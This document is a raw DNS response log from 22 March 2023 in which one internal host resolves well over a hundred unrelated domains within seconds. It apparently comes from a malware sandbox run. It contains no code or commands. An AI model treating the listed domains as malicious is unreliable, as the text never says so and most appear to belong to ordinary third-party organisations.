Mar 22, 2023 05:44:50.730871916 CET	8.8.8.8	192.168.2.5	0x7c67	No error (0)	ncn.de		46.30.60.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.740314007 CET	8.8.8.8	192.168.2.5	0xa18a	No error (0)	shteeble.com		185.106.129.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.822340012 CET	8.8.8.8	192.168.2.5	0x4a2b	No error (0)	dog-jog.net		153.122.24.177	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.896768093 CET	8.8.8.8	192.168.2.5	0x4773	No error (0)	kayoaiba.com		154.213.117.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.940303087 CET	8.8.8.8	192.168.2.5	0x5ea4	No error (0)	cubodown.com		172.67.150.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:50.940303087 CET	8.8.8.8	192.168.2.5	0x5ea4	No error (0)	cubodown.com		104.21.30.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.109658957 CET	8.8.8.8	192.168.2.5	0xa273	No error (0)	akr.co.id		104.20.123.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.109658957 CET	8.8.8.8	192.168.2.5	0xa273	No error (0)	akr.co.id		172.67.33.252	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.109658957 CET	8.8.8.8	192.168.2.5	0xa273	No error (0)	akr.co.id		104.20.122.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.111759901 CET	8.8.8.8	192.168.2.5	0xaaef	No error (0)	cjcagent.com		157.112.187.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.236884117 CET	8.8.8.8	192.168.2.5	0x6e65	No error (0)	noblesse.be		5.134.4.115	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.291924953 CET	8.8.8.8	192.168.2.5	0x63d3	No error (0)	umcor.am		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.291924953 CET	8.8.8.8	192.168.2.5	0x63d3	No error (0)	umcor.am		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.350872993 CET	8.8.8.8	192.168.2.5	0xa56c	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.411920071 CET	8.8.8.8	192.168.2.5	0x8c76	No error (0)	shesfit.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.411920071 CET	8.8.8.8	192.168.2.5	0x8c76	No error (0)	shesfit.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.512486935 CET	8.8.8.8	192.168.2.5	0xbb07	No error (0)	dyag-eng.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.566243887 CET	8.8.8.8	192.168.2.5	0x5bb	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.615211964 CET	8.8.8.8	192.168.2.5	0x1f29	No error (0)	missnue.com		104.21.234.120	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.615211964 CET	8.8.8.8	192.168.2.5	0x1f29	No error (0)	missnue.com		104.21.234.121	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:51.742806911 CET	8.8.8.8	192.168.2.5	0x6cfc	No error (0)	dog-jog.net		153.122.24.177	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.180324078 CET	8.8.8.8	192.168.2.5	0xb3b	No error (0)	mkm-gr.com		79.124.76.247	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.302428961 CET	8.8.8.8	192.168.2.5	0x6228	No error (0)	hyabmagneter.se		104.21.69.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.302428961 CET	8.8.8.8	192.168.2.5	0x6228	No error (0)	hyabmagneter.se		172.67.209.90	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.313930035 CET	8.8.8.8	192.168.2.5	0xfb89	No error (0)	biurohera.pl		54.36.175.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.313930035 CET	8.8.8.8	192.168.2.5	0xfb89	No error (0)	biurohera.pl		79.96.161.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.438957930 CET	8.8.8.8	192.168.2.5	0x74b2	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.438957930 CET	8.8.8.8	192.168.2.5	0x74b2	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:52.617063046 CET	8.8.8.8	192.168.2.5	0x5bb	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.141782045 CET	8.8.8.8	192.168.2.5	0x3c4f	No error (0)	apcotex.com		35.154.163.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.169061899 CET	8.8.8.8	192.168.2.5	0xe9f6	No error (0)	akdeniz.nl		109.71.54.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.274547100 CET	8.8.8.8	192.168.2.5	0x3c7b	No error (0)	ossir.org		51.159.3.117	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.288592100 CET	8.8.8.8	192.168.2.5	0x6cfc	No error (0)	dog-jog.net		153.122.24.177	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.329360962 CET	8.8.8.8	192.168.2.5	0xbfb4	No error (0)	ruzee.com		207.180.198.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.372808933 CET	8.8.8.8	192.168.2.5	0xd60a	No error (0)	likangds.com		23.225.40.19	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.376305103 CET	8.8.8.8	192.168.2.5	0x4b67	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.376305103 CET	8.8.8.8	192.168.2.5	0x4b67	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.385315895 CET	8.8.8.8	192.168.2.5	0x3f6f	No error (0)	calvinly.com		216.239.32.21	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.385315895 CET	8.8.8.8	192.168.2.5	0x3f6f	No error (0)	calvinly.com		216.239.34.21	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.385315895 CET	8.8.8.8	192.168.2.5	0x3f6f	No error (0)	calvinly.com		216.239.38.21	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.385315895 CET	8.8.8.8	192.168.2.5	0x3f6f	No error (0)	calvinly.com		216.239.36.21	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.394900084 CET	8.8.8.8	192.168.2.5	0x2054	No error (0)	slower.it		127.0.0.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.398828030 CET	8.8.8.8	192.168.2.5	0x5ddf	No error (0)	t-mould.com		81.169.145.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.465496063 CET	8.8.8.8	192.168.2.5	0x74d8	No error (0)	wanoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.465496063 CET	8.8.8.8	192.168.2.5	0x74d8	No error (0)	wanoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.467715979 CET	8.8.8.8	192.168.2.5	0xb45c	Name error (3)	agitz.com.br	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.487023115 CET	8.8.8.8	192.168.2.5	0xc2c8	No error (0)	revoldia.net		45.200.235.135	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.496510029 CET	8.8.8.8	192.168.2.5	0x99b1	No error (0)	acraloc.com		192.64.150.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.513741970 CET	8.8.8.8	192.168.2.5	0xc053	No error (0)	dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.513741970 CET	8.8.8.8	192.168.2.5	0xc053	No error (0)	dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.631804943 CET	8.8.8.8	192.168.2.5	0x5bb	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.723742962 CET	8.8.8.8	192.168.2.5	0xc68a	No error (0)	biosolve.com		151.101.130.159	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.741242886 CET	8.8.8.8	192.168.2.5	0x8738	No error (0)	a-domani.com		183.90.232.24	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:54.820276976 CET	8.8.8.8	192.168.2.5	0x8b28	No error (0)	valselit.com		193.70.68.254	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.050118923 CET	8.8.8.8	192.168.2.5	0x6dc	No error (0)	riwn.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.050118923 CET	8.8.8.8	192.168.2.5	0x6dc	No error (0)	riwn.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.050118923 CET	8.8.8.8	192.168.2.5	0x6dc	No error (0)	riwn.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.050118923 CET	8.8.8.8	192.168.2.5	0x6dc	No error (0)	riwn.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.264396906 CET	8.8.8.8	192.168.2.5	0xfef7	No error (0)	hes.pt		52.19.230.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.265604973 CET	8.8.8.8	192.168.2.5	0xb53d	Name error (3)	www.yumgiskor.kz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.512450933 CET	8.8.8.8	192.168.2.5	0x6b63	No error (0)	shittas.com		43.246.117.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.532636881 CET	8.8.8.8	192.168.2.5	0xf6a3	No error (0)	orbitgas.com		107.180.58.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.545932055 CET	8.8.8.8	192.168.2.5	0xa026	No error (0)	wvs-net.de		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.545932055 CET	8.8.8.8	192.168.2.5	0xa026	No error (0)	wvs-net.de		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.553045988 CET	8.8.8.8	192.168.2.5	0xa1fb	No error (0)	4locals.net		80.82.115.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.654067039 CET	8.8.8.8	192.168.2.5	0x2422	No error (0)	nettlinx.org		202.53.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.742999077 CET	8.8.8.8	192.168.2.5	0xc5ce	No error (0)	nblewis.com		35.168.185.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.742999077 CET	8.8.8.8	192.168.2.5	0xc5ce	No error (0)	nblewis.com		52.0.29.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.742999077 CET	8.8.8.8	192.168.2.5	0xc5ce	No error (0)	nblewis.com		35.169.15.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.867588997 CET	8.8.8.8	192.168.2.5	0xb022	No error (0)	siongann.com		104.21.8.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.867588997 CET	8.8.8.8	192.168.2.5	0xb022	No error (0)	siongann.com		172.67.156.237	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.878737926 CET	8.8.8.8	192.168.2.5	0xa20c	No error (0)	amic.at		78.46.224.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.927201986 CET	8.8.8.8	192.168.2.5	0x7e48	No error (0)	refintl.org		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.927201986 CET	8.8.8.8	192.168.2.5	0x7e48	No error (0)	refintl.org		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.927201986 CET	8.8.8.8	192.168.2.5	0x7e48	No error (0)	refintl.org		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.927201986 CET	8.8.8.8	192.168.2.5	0x7e48	No error (0)	refintl.org		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.949837923 CET	8.8.8.8	192.168.2.5	0x4951	No error (0)	ascc.org.au		203.210.102.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:55.991841078 CET	8.8.8.8	192.168.2.5	0x2422	No error (0)	nettlinx.org		202.53.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.046981096 CET	8.8.8.8	192.168.2.5	0x4973	No error (0)	fr-dat.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.108700991 CET	8.8.8.8	192.168.2.5	0xf3aa	Name error (3)	haigh-me.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.157789946 CET	8.8.8.8	192.168.2.5	0xe7f6	No error (0)	shztm.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.209827900 CET	8.8.8.8	192.168.2.5	0xde4e	No error (0)	acraloc.com		192.64.150.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.290791988 CET	8.8.8.8	192.168.2.5	0xfe0d	No error (0)	hamaker.net		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.317420006 CET	8.8.8.8	192.168.2.5	0xe42e	No error (0)	pertex.com		185.151.30.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.322475910 CET	8.8.8.8	192.168.2.5	0x94a2	No error (0)	mjrcpas.com		154.81.136.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.352739096 CET	8.8.8.8	192.168.2.5	0xe498	No error (0)	btsi.com.ph		69.46.30.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.503277063 CET	8.8.8.8	192.168.2.5	0x3fab	No error (0)	nels.co.uk		5.134.13.210	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.602976084 CET	8.8.8.8	192.168.2.5	0x566b	Name error (3)	www.owsports.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.730266094 CET	8.8.8.8	192.168.2.5	0xe2c1	No error (0)	linac.co.uk		23.236.62.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.799969912 CET	8.8.8.8	192.168.2.5	0x7904	No error (0)	atbauk.org		104.21.92.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.799969912 CET	8.8.8.8	192.168.2.5	0x7904	No error (0)	atbauk.org		172.67.196.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:56.804358959 CET	8.8.8.8	192.168.2.5	0xcec4	No error (0)	wnit.org		38.111.255.201	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.047777891 CET	8.8.8.8	192.168.2.5	0xf4d7	No error (0)	aba.org.eg		192.169.149.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.180505037 CET	8.8.8.8	192.168.2.5	0x3685	No error (0)	ascc.org.au		203.210.102.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.269001007 CET	8.8.8.8	192.168.2.5	0xc25	No error (0)	fifa-ews.com		104.21.10.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.269001007 CET	8.8.8.8	192.168.2.5	0xc25	No error (0)	fifa-ews.com		172.67.189.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.269041061 CET	8.8.8.8	192.168.2.5	0x5835	No error (0)	hazmatt.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.270931005 CET	8.8.8.8	192.168.2.5	0xd1d5	No error (0)	araax.com	traff-4.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:57.270931005 CET	8.8.8.8	192.168.2.5	0xd1d5	No error (0)	traff-4.hugedomains.com	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:57.270931005 CET	8.8.8.8	192.168.2.5	0xd1d5	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		3.94.41.167	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.270931005 CET	8.8.8.8	192.168.2.5	0xd1d5	No error (0)	hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com		52.86.6.113	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.400199890 CET	8.8.8.8	192.168.2.5	0xd19f	No error (0)	linac.co.uk		23.236.62.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.519762039 CET	8.8.8.8	192.168.2.5	0x4436	No error (0)	portoccd.org		51.89.6.56	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.524908066 CET	8.8.8.8	192.168.2.5	0x25e	No error (0)	kavram.com		172.67.189.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.524908066 CET	8.8.8.8	192.168.2.5	0x25e	No error (0)	kavram.com		104.21.89.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.550395012 CET	8.8.8.8	192.168.2.5	0xabb	No error (0)	xinhui.net		43.255.29.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.579477072 CET	8.8.8.8	192.168.2.5	0xf9ce	No error (0)	kairel.com		54.217.118.81	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.616388083 CET	8.8.8.8	192.168.2.5	0x367a	No error (0)	gbp-jp.com		208.80.122.205	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.616388083 CET	8.8.8.8	192.168.2.5	0x367a	No error (0)	gbp-jp.com		208.80.123.104	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.616388083 CET	8.8.8.8	192.168.2.5	0x367a	No error (0)	gbp-jp.com		208.80.123.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.616388083 CET	8.8.8.8	192.168.2.5	0x367a	No error (0)	gbp-jp.com		208.80.122.2	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.622086048 CET	8.8.8.8	192.168.2.5	0x2557	No error (0)	cbaben.com		173.205.126.33	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.678212881 CET	8.8.8.8	192.168.2.5	0x8358	No error (0)	ludomemo.com		27.0.174.59	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.678859949 CET	8.8.8.8	192.168.2.5	0xe889	No error (0)	mjrcpas.com		154.81.136.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.769459009 CET	8.8.8.8	192.168.2.5	0xf29b	No error (0)	ftmobile.com		199.34.228.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.773406029 CET	8.8.8.8	192.168.2.5	0x8578	No error (0)	wantapc.net		157.7.107.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.925254107 CET	8.8.8.8	192.168.2.5	0xac8a	No error (0)	vfcindia.com		68.71.135.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.990582943 CET	8.8.8.8	192.168.2.5	0xb937	No error (0)	dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:57.990582943 CET	8.8.8.8	192.168.2.5	0xb937	No error (0)	dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.043006897 CET	8.8.8.8	192.168.2.5	0x189	Name error (3)	haigh-me.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.164736032 CET	8.8.8.8	192.168.2.5	0x5bff	No error (0)	from30ty.com		157.7.231.224	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.199767113 CET	8.8.8.8	192.168.2.5	0x1c33	No error (0)	duiops.net		135.125.108.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.247188091 CET	8.8.8.8	192.168.2.5	0xdca2	No error (0)	slower.it		127.0.0.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.247495890 CET	8.8.8.8	192.168.2.5	0xa2c1	Name error (3)	haigh-me.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.265330076 CET	8.8.8.8	192.168.2.5	0x875d	No error (0)	lyto.net		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.265330076 CET	8.8.8.8	192.168.2.5	0x875d	No error (0)	lyto.net		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.333039045 CET	8.8.8.8	192.168.2.5	0x5a53	No error (0)	xsui.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.340154886 CET	8.8.8.8	192.168.2.5	0x808c	No error (0)	nettlinx.org		202.53.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.344396114 CET	8.8.8.8	192.168.2.5	0x7a41	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.363195896 CET	8.8.8.8	192.168.2.5	0x999b	No error (0)	fundeo.com		104.24.160.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.363195896 CET	8.8.8.8	192.168.2.5	0x999b	No error (0)	fundeo.com		104.24.161.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.363195896 CET	8.8.8.8	192.168.2.5	0x999b	No error (0)	fundeo.com		172.67.97.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.363693953 CET	8.8.8.8	192.168.2.5	0xc785	No error (0)	hbfuels.com		85.233.160.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.371680021 CET	8.8.8.8	192.168.2.5	0x92a0	Name error (3)	haigh-me.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.393651009 CET	8.8.8.8	192.168.2.5	0xf167	No error (0)	gbp-jp.com		208.80.123.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.393651009 CET	8.8.8.8	192.168.2.5	0xf167	No error (0)	gbp-jp.com		208.80.122.2	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.393651009 CET	8.8.8.8	192.168.2.5	0xf167	No error (0)	gbp-jp.com		208.80.122.205	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.393651009 CET	8.8.8.8	192.168.2.5	0xf167	No error (0)	gbp-jp.com		208.80.123.104	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.397986889 CET	8.8.8.8	192.168.2.5	0xce01	No error (0)	shesfit.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.397986889 CET	8.8.8.8	192.168.2.5	0xce01	No error (0)	shesfit.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.410214901 CET	8.8.8.8	192.168.2.5	0x7702	No error (0)	mijash3.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.410214901 CET	8.8.8.8	192.168.2.5	0x7702	No error (0)	mijash3.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.410214901 CET	8.8.8.8	192.168.2.5	0x7702	No error (0)	mijash3.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.410214901 CET	8.8.8.8	192.168.2.5	0x7702	No error (0)	mijash3.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.420599937 CET	8.8.8.8	192.168.2.5	0x5d94	No error (0)	isom.org		192.124.249.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.490128040 CET	8.8.8.8	192.168.2.5	0x70d9	No error (0)	banvari.com		23.227.38.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.527005911 CET	8.8.8.8	192.168.2.5	0x81b	No error (0)	gcss.com		35.186.238.101	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.627810955 CET	8.8.8.8	192.168.2.5	0xabdf	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.667814016 CET	8.8.8.8	192.168.2.5	0xb44c	No error (0)	pellys.co.uk		77.72.4.226	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.753225088 CET	8.8.8.8	192.168.2.5	0x25f1	No error (0)	bidroll.com		13.56.33.8	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.786756039 CET	8.8.8.8	192.168.2.5	0xd733	No error (0)	hes.pt		52.19.230.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.793843031 CET	8.8.8.8	192.168.2.5	0x32d2	No error (0)	aiolos-sa.gr		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.793843031 CET	8.8.8.8	192.168.2.5	0x32d2	No error (0)	aiolos-sa.gr		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.798959017 CET	8.8.8.8	192.168.2.5	0x3e6b	No error (0)	webways.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.798959017 CET	8.8.8.8	192.168.2.5	0x3e6b	No error (0)	webways.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.813653946 CET	8.8.8.8	192.168.2.5	0x3111	No error (0)	tcpoa.com		159.89.244.183	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.813653946 CET	8.8.8.8	192.168.2.5	0x3111	No error (0)	tcpoa.com		164.90.244.158	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.855453968 CET	8.8.8.8	192.168.2.5	0x96ad	No error (0)	zugseil.com		92.42.191.38	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.885396004 CET	8.8.8.8	192.168.2.5	0x5b93	No error (0)	adventist.ro		49.12.155.123	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.922821999 CET	8.8.8.8	192.168.2.5	0x13d7	No error (0)	www.pb-games.com	pb-games.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:44:58.922821999 CET	8.8.8.8	192.168.2.5	0x13d7	No error (0)	pb-games.com		173.254.28.29	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:58.985419989 CET	8.8.8.8	192.168.2.5	0x4517	No error (0)	ftmobile.com		199.34.228.78	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.001979113 CET	8.8.8.8	192.168.2.5	0x217a	No error (0)	xinhui.net		43.255.29.192	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.018676043 CET	8.8.8.8	192.168.2.5	0x1e6e	No error (0)	aiolos-sa.gr		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.018676043 CET	8.8.8.8	192.168.2.5	0x1e6e	No error (0)	aiolos-sa.gr		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.037884951 CET	8.8.8.8	192.168.2.5	0x9ddd	No error (0)	sinwal.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.037884951 CET	8.8.8.8	192.168.2.5	0x9ddd	No error (0)	sinwal.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.039736986 CET	8.8.8.8	192.168.2.5	0x493	No error (0)	pellys.co.uk		77.72.4.226	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.118797064 CET	8.8.8.8	192.168.2.5	0x702f	No error (0)	nblewis.com		52.0.29.214	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.118797064 CET	8.8.8.8	192.168.2.5	0x702f	No error (0)	nblewis.com		35.168.185.204	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.118797064 CET	8.8.8.8	192.168.2.5	0x702f	No error (0)	nblewis.com		35.169.15.168	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.138355970 CET	8.8.8.8	192.168.2.5	0x31f2	No error (0)	nolaoig.org		54.212.145.129	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.333548069 CET	8.8.8.8	192.168.2.5	0x1295	No error (0)	cjborden.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.333548069 CET	8.8.8.8	192.168.2.5	0x1295	No error (0)	cjborden.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.346788883 CET	8.8.8.8	192.168.2.5	0x3efc	No error (0)	gbp-jp.com		208.80.123.195	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.346788883 CET	8.8.8.8	192.168.2.5	0x3efc	No error (0)	gbp-jp.com		208.80.122.2	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:44:59.346788883 CET	8.8.8.8	192.168.2.5	0x3efc	No error (0)	gbp-jp.com		208.80.122.205	A (IP address)	IN (0x0001)	false
